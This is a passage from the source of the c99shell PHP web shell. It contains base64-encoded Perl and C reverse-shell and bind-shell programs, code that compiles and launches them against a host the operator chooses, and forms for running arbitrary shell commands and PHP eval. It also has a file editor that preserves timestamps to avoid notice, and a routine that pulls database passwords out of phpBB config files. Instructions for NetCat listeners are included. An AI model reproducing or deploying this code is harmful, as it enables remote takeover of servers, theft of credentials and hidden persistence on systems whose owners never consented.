  1604. "DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
  1605. "CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
  1606. "ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
  1607. "aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
  1608. "J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
  1609. "ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
  1610. "fQ==",
  1611.  
  1612. "c99sh_backconn.pl"=>
  1613. "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
  1614. "HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
  1615. "DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
  1616. "HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
  1617. "CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
  1618. "GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
  1619. "WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
  1620. "iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
  1621. "VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
  1622. "FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
  1623.  
  1624. "c99sh_backconn.c"=>
  1625. "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
  1626. "dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
  1627. "Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
  1628. "YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
  1629. "aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
  1630. "cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
  1631. "XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
  1632. "DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
  1633. "Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
  1634. "KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
  1635. "ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
  1636. "c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
  1637. );
  1638.  
  1639.  $bndportsrcs = array(
  1640. "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
  1641. "c99sh_bindport.c"=>array("Using C","%path %port %pass")
  1642. );
  1643.  
  1644.  $bcsrcs = array(
  1645. "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  1646. "c99sh_backconn.c"=>array("Using C","%path %host %port")
  1647. );
  1648.  
  1649.  if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
  1650.  else
  1651.  {
  1652.   if (!is_array($bind)) {$bind = array();}
  1653.   if (!is_array($bc)) {$bc = array();}
  1654.   if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
  1655.   if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
  1656.   if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
  1657.   if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
  1658.   if (!empty($bindsubmit))
  1659.   {
  1660.    echo "<b>Result of binding port:</b><br>";
  1661.    $v = $bndportsrcs[$bind[src]];
  1662.    if (empty($v)) {echo "Unknown file!<br>";}
  1663.    elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  1664.    else
  1665.    {
  1666.     $srcpath = $tmpdir.$bind[src];
  1667.     $w = explode(".",$bind[src]);
  1668.     $ext = $w[count($w)-1];
  1669.     unset($w[count($w)-1]);
  1670.     $binpath = $tmpdir.join(".",$w);
  1671.     if ($ext == "pl") {$binpath = $srcpath;}
  1672.     @unlink($srcpath);
  1673.     $fp = fopen($srcpath,"ab+");
  1674.     if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  1675.     else
  1676.     {
  1677.      $data = base64_decode($bndsrcs[$bind[src]]);
  1678.      fwrite($fp,$data,strlen($data));
  1679.      fclose($fp);
  1680.  
  1681.      if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
  1682.  
  1683.      $v[1] = str_replace("%path",$binpath,$v[1]);
  1684.      $v[1] = str_replace("%port",$bind[port],$v[1]);
  1685.      $v[1] = str_replace("%pass",$bind[pass],$v[1]);
  1686.      $v[1] = str_replace("//","/",$v[1]);
  1687.      $retbind = myshellexec($v[1]." > /dev/null &");
  1688.      sleep(5); //Timeout
  1689.      $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
  1690.      if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
  1691.      else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
  1692.     }
  1693.     echo "<br>";
  1694.    }
  1695.   }
  1696.   if (!empty($bcsubmit))
  1697.   {
  1698.    echo "<b>Result of back connection:</b><br>";
  1699.    $v = $bcsrcs[$bc[src]];
  1700.    if (empty($v)) {echo "Unknown file!<br>";}
  1701.    else
  1702.    {
  1703.     $srcpath = $tmpdir.$bc[src];
  1704.     $w = explode(".",$bc[src]);
  1705.     $ext = $w[count($w)-1];
  1706.     unset($w[count($w)-1]);
  1707.     $binpath = $tmpdir.join(".",$w);
  1708.     if ($ext == "pl") {$binpath = $srcpath;}
  1709.     @unlink($srcpath);
  1710.     $fp = fopen($srcpath,"ab+");
  1711.     if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  1712.     else
  1713.     {
  1714.      $data = base64_decode($bndsrcs[$bind[src]]);
  1715.      fwrite($fp,$data,strlen($data));
  1716.      fclose($fp);
  1717.      if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  1718.      $v[1] = str_replace("%path",$binpath,$v[1]);
  1719.      $v[1] = str_replace("%host",$bc[host],$v[1]);
  1720.      $v[1] = str_replace("%port",$bc[port],$v[1]);
  1721.      $v[1] = str_replace("//","/",$v[1]);
  1722.      $retbind = myshellexec($v[1]." > /dev/null &");
  1723.      echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
  1724.     }
  1725.    }
  1726.   }
  1727.   ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
  1728. foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
  1729. ?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
  1730. <b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
  1731. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
  1732. ?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
  1733. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
  1734.  }
  1735. }
  1736. if ($act == "cmd")
  1737. {
  1738.  if (!empty($submit))
  1739.  {
  1740.   echo "<b>Result of execution this command</b>:<br>";
  1741.   $tmp = ob_get_contents();
  1742.   $olddir = realpath(".");
  1743.   @chdir($d);
  1744.   if ($tmp)
  1745.   {
  1746.    ob_clean();
  1747.    myshellexec($cmd);
  1748.    $ret = ob_get_contents();
  1749.    $ret = convert_cyr_string($ret,"d","w");
  1750.    ob_clean();
  1751.    echo $tmp;
  1752.    if ($cmd_txt)
  1753.    {
  1754.     $rows = count(explode("
  1755. ",$ret))+1;
  1756.     if ($rows < 10) {$rows = 10;}
  1757.     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1758.    }
  1759.    else {echo $ret;}
  1760.   }
  1761.   else
  1762.   {
  1763.    if ($cmd_txt)
  1764.    {
  1765.     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1766.     myshellexec($cmd);
  1767.     echo "</textarea>";
  1768.    }
  1769.    else {echo $ret;}
  1770.   }
  1771.   @chdir($olddir);
  1772.  }
  1773.  else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
  1774.  echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1775. }
  1776. if ($act == "ps_aux")
  1777. {
  1778.  echo "<b>Processes:</b><br>";
  1779.  if ($win) {echo "This function not work in Windows!<br><br>";}
  1780.  else
  1781.  {
  1782.   if ($pid)
  1783.   {
  1784.    if (!$sig) {$sig = 9;}
  1785.    echo "Sending signal ".$sig." to #".$pid."... ";
  1786.    $ret = posix_kill($pid,$sig);
  1787.    if ($ret) {echo "ok. he is dead, amen.";}
  1788.    else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
  1789.   }
  1790.   $ret = `ps -aux`;
  1791.   if (!$ret) {echo "Can't execute \"ps -aux\"!";}
  1792.   else
  1793.   {
  1794.    $ret = htmlspecialchars($ret);
  1795.    $ret = str_replace(" "," ",$ret);
  1796.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  1797.    $prcs = explode("\n",$ret);
  1798.    $head = explode(" ",$prcs[0]);
  1799.    $head[] = "ACTION";
  1800.    unset($prcs[0]);
  1801.    echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  1802.    echo "<tr border=\"1\">";
  1803.    foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
  1804.    echo "</tr>";
  1805.    foreach ($prcs as $line)
  1806.    {
  1807.     if (!empty($line))
  1808.     {
  1809.      echo "<tr>";
  1810.      $line = explode(" ",$line);
  1811.      $line[10] = join(" ",array_slice($line,10,count($line)));
  1812.      $line = array_slice($line,0,11);
  1813.      $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  1814.      foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
  1815.      echo "</tr>";
  1816.     }
  1817.    }
  1818.    echo "</table>";
  1819.   }
  1820.  }
  1821. }
  1822. if ($act == "eval")
  1823. {
  1824.  if (!empty($eval))
  1825.  {
  1826.   echo "<b>Result of execution this PHP-code</b>:<br>";
  1827.   $tmp = ob_get_contents();
  1828.   $olddir = realpath(".");
  1829.   @chdir($d);
  1830.   if ($tmp)
  1831.   {
  1832.    ob_clean();
  1833.    eval($eval);
  1834.    $ret = ob_get_contents();
  1835.    $ret = convert_cyr_string($ret,"d","w");
  1836.    ob_clean();
  1837.    echo $tmp;
  1838.    if ($eval_txt)
  1839.    {
  1840.     $rows = count(explode("
  1841. ",$ret))+1;
  1842.     if ($rows < 10) {$rows = 10;}
  1843.     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1844.    }
  1845.    else {echo $ret;}
  1846.   }
  1847.   else
  1848.   {
  1849.    if ($eval_txt)
  1850.    {
  1851.     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1852.     eval($eval);
  1853.     echo "</textarea>";
  1854.    }
  1855.    else {echo $ret;}
  1856.   }
  1857.   @chdir($olddir);
  1858.  }
  1859.  else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
  1860.  echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  1861. }
  1862. if ($act == "f")
  1863. {
  1864.  $r = @file_get_contents($d.$f);
  1865.  if (!is_readable($d.$f) and $ft != "edit")
  1866.  {
  1867.   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  1868.   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  1869.  }
  1870.  else
  1871.  {
  1872.   $ext = explode(".",$f);
  1873.   $c = count($ext)-1;
  1874.   $ext = $ext[$c];
  1875.   $ext = strtolower($ext);
  1876.   $rft = "";
  1877.   foreach($ftypes as $k=>$v)
  1878.   {
  1879.    if (in_array($ext,$v)) {$rft = $k; break;}
  1880.   }
  1881.   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  1882.   if (empty($ft)) {$ft = $rft;}
  1883.   $arr = array(
  1884. array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  1885. array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  1886. array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  1887. array("Code","code"),
  1888. array("Session","phpsess"),
  1889. array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  1890. array("SDB","sdb"),
  1891. array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  1892. array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  1893. array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  1894. array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  1895. array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  1896. );
  1897.   echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1898.   if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
  1899.   else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
  1900.   echo "</b><br>Select action/file-type:<br>";
  1901.   foreach($arr as $t)
  1902.   {
  1903.    if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
  1904.    elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  1905.    else
  1906.    {
  1907.     echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
  1908.    }
  1909.    echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  1910.   }
  1911.   echo "<hr size=\"1\" noshade>";
  1912.   if ($ft == "info")
  1913.   {
  1914.    echo "<b>Information:</b>";
  1915.    echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
  1916.    echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
  1917.    echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  1918.    if (!$win)
  1919.    {
  1920.     echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
  1921.     $tmp=posix_getpwuid(fileowner($d.$f));
  1922.     if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
  1923.     else echo $tmp['name']." ";
  1924.     $tmp=posix_getgrgid(filegroup($d.$f));
  1925.     if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
  1926.     else echo $tmp['name'];
  1927.    }
  1928.    echo "<tr class=tr><td><b>Perms</b></td><td>";
  1929.    
  1930.    if (is_writable($d.$f))
  1931.    {
  1932.     echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
  1933.    }
  1934.    else
  1935.    {
  1936.     echo "<font>".view_perms(fileperms($d.$f))."</font>";
  1937.    }
  1938.  
  1939.    echo "</td></tr>";
  1940.    echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
  1941.    echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
  1942.    echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
  1943.    echo "</table><br>";
  1944.  
  1945.  
  1946.    $fi = fopen($d.$f,"rb");
  1947.    if ($fi)
  1948.    {
  1949.     if ($fullhexdump)
  1950.     {
  1951.      echo "<b>FULL HEXDUMP</b>";
  1952.      $str=fread($fi,filesize($d.$f));
  1953.     }
  1954.     else
  1955.     {
  1956.      echo "<b>HEXDUMP PREVIEW</b>";
  1957.      $str=fread($fi,$hexdump_lines*$hexdump_rows);
  1958.     }
  1959.     $n=0;
  1960.     $a0="00000000<br>";
  1961.     $a1="";
  1962.     $a2="";
  1963.     for ($i=0; $i<strlen($str); $i++)
  1964.     {
  1965.      $a1.=sprintf("%02X",ord($str[$i])).' ';
  1966.      switch (ord($str[$i]))
  1967.      {
  1968.       case 0:  $a2.="<font class=s2>0</font>"; break;
  1969.       case 32:
  1970.       case 10:
  1971.       case 13: $a2.="&nbsp;"; break;
  1972.       default:  $a2.=htmlspecialchars($str[$i]);
  1973.      }
  1974.      $n++;
  1975.      if ($n == $hexdump_rows)
  1976.      {
  1977.       $n = 0;
  1978.       if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
  1979.       $a1.="<br>";
  1980.       $a2.="<br>";
  1981.      }
  1982.     }
  1983.     //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
  1984.     echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
  1985.          "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
  1986.          "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
  1987.    }
  1988.    $encoded = "";
  1989.    if ($base64 == 1)
  1990.    {
  1991.     echo "<b>Base64 Encode</b><br>";
  1992.     $encoded = base64_encode($r);
  1993.    }
  1994.    elseif($base64 == 2)
  1995.    {
  1996.     echo "<b>Base64 Encode + Chunk</b><br>";
  1997.     $encoded = chunk_split(base64_encode($r));
  1998.    }
  1999.    elseif($base64 == 3)
  2000.    {
  2001.     echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2002.     $encoded = base64_encode($r);
  2003.     $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2004.    }
  2005.    elseif($base64 == 4)
  2006.    {
  2007.    }
  2008.    if (!empty($encoded))
  2009.    {
  2010.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2011.    }
  2012.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2013.   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2014.   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2015.   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2016.   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2017.   <P>";
  2018.   }
  2019.   elseif ($ft == "html")
  2020.   {
  2021.    if ($white) {@ob_clean();}
  2022.    echo $r;
  2023.    if ($white) {exit;}
  2024.   }
  2025.   elseif ($ft == "txt")
  2026.   {
  2027.    echo "<pre>".htmlspecialchars($r)."</pre>";
  2028.   }
  2029.   elseif ($ft == "ini")
  2030.   {
  2031.    echo "<pre>";
  2032.    var_dump(parse_ini_file($d.$f,true));
  2033.    echo "</pre>";
  2034.   }
  2035.   elseif ($ft == "phpsess")
  2036.   {
  2037.    echo "<pre>";
  2038.    $v = explode("|",$r);
  2039.    echo $v[0]."<br>";
  2040.    var_dump(unserialize($v[1]));
  2041.    echo "</pre>";
  2042.   }
  2043.   elseif ($ft == "exe")
  2044.   {
  2045.    echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
  2046.   }
  2047.   elseif ($ft == "sdb")
  2048.   {
  2049.    echo "<pre>";
  2050.    var_dump(unserialize(base64_decode($r)));
  2051.    echo "</pre>";
  2052.   }
  2053.   elseif ($ft == "code")
  2054.   {
  2055.    if (ereg("phpBB 2.(.*) auto-generated config file",$r))
  2056.    {
  2057.     $arr = explode("
  2058. ",$r);
  2059.     if (count($arr == 18))
  2060.     {
  2061.      include($d.$f);
  2062.      echo "<b>phpBB configuration is detected in this file!<br>";
  2063.      if ($dbms == "mysql4") {$dbms = "mysql";}
  2064.      if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2065.      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
  2066.      echo "Parameters for manual connect:<br>";
  2067.      $cfgvars = array(
  2068.      "dbms"=>$dbms,
  2069.      "dbhost"=>$dbhost,
  2070.      "dbname"=>$dbname,
  2071.      "dbuser"=>$dbuser,
  2072.      "dbpasswd"=>$dbpasswd
  2073.      );
  2074.      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2075.  
  2076.      echo "</b>";
  2077.      echo "<hr size=\"1\" noshade>";
  2078.     }
  2079.    }
  2080.    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
  2081.    if (!empty($white)) {@ob_clean();}
  2082.    if ($rehtml) {$r = rehtmlspecialchars($r);}
  2083.    $r = stripslashes($r);
  2084.    $strip = false;
  2085.    if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
  2086.    $r = @highlight_string($r, TRUE);
  2087.    if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
  2088.    echo $r;
  2089.    if (!empty($white)) {exit;}
  2090.    echo "</div>";
  2091.   }
  2092.   elseif ($ft == "download")
  2093.   {
  2094.    @ob_clean();
  2095.    header("Content-type: c99shell");
  2096.    header("Content-disposition: attachment; filename=\"".$f."\";");
  2097.    echo($r);
  2098.    exit;
  2099.   }
  2100.   elseif ($ft == "notepad")
  2101.   {
  2102.    @ob_clean();
  2103.    header("Content-type: text/plain");
  2104.    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2105.    echo($r);
  2106.    exit;
  2107.   }
  2108.   elseif ($ft == "img")
  2109.   {
  2110.    if (!$white)
  2111.    {
  2112.     echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
  2113.    }
  2114.    else
  2115.    {
  2116.     @ob_clean();
  2117.     $ext = explode($f,".");
  2118.     $ext = $ext[count($ext)-1];
  2119.     header("Content-type: image/gif");
  2120.     echo($r);
  2121.     exit;
  2122.    }
  2123.   }
  2124.   elseif ($ft == "edit")
  2125.   {
  2126.    if (!empty($submit))
  2127.    {
  2128.     if ($filestealth) {$stat = stat($d.$f);}
  2129.     if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
  2130.     $fp = fopen($d.$f,"w");
  2131.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  2132.     else
  2133.     {
  2134.      echo "<b>Saved!</b>";
  2135.      fwrite($fp,$nfcontent);
  2136.      fclose($fp);
  2137.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2138.      $r = $nfcontent;
  2139.     }
  2140.    }
  2141.    $rows = count(explode("
  2142. ",$r));
  2143.    if ($rows < 10) {$rows = 10;}
  2144.    if ($rows > 30) {$rows = 30;}
  2145.    echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2146.   }
  2147.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2148.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2149.  }
  2150. }
  2151. if ($act == "phpinfo")
  2152. {
  2153.  ob_end_clean();
  2154.  phpinfo();
  2155.  exit;
  2156. }
